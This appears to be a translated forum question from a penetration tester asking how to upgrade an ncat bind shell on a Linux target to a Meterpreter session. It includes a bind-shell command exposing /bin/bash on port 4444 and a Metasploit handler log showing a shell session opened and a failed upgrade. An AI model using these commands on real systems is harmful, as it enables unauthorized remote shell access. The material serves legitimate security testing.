Durante las pruebas de penetración, a menudo puedo abrir un Ncat Bind Shell en el sistema de la víctima (linux), que abre un puerto al que puedo conectarme:
nc -l -v -k -e /bin/bash -p 4444
Ahora quiero actualizar este shell ncat a una sesión de meterpreter. Encontré esta publicación en el foro de la comunidad rapid7 que aborda el problema:
La respuesta dada es la siguiente:
Netcat es un ejecutable completamente independiente que no se puede actualizar desde el marco a meterpreter. Puede agregar una cuenta de usuario a través de la línea de comandos, luego usar psexec para cargar y ejecutar el binario del medidor de contador.
Básicamente, metasploit siempre enviará primero un stager que luego descarga el binario completo de meterpreter, pero no puede interactuar directamente con el shell ncat. La publicación sugiere simplemente cargar el binario completo de meterpreter a través del shell ncat y luego ejecutarlo. Sin embargo, no pude encontrar un binario independiente dentro del marco.
PS: Aquí hay algunos resultados de depuración del marco metasploit al intentar actualizar el shell ncat:
msf > use multi/handler
msf exploit(handler) > set payload linux/x64/shell/bind_tcp
payload => linux/x64/shell/bind_tcp
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set RHOST 192.168.0.101
RHOST => 192.168.0.3
msf exploit(handler) > run
[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (38 bytes) to 192.168.0.101
[*] Command shell session 1 opened (192.168.0.17:33097 -> 192.168.0.101:4444) at 2017-06-05 10:23:35 +0200
Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[-] Shells on the target platform, linux, cannot be upgraded to Meterpreter at this time.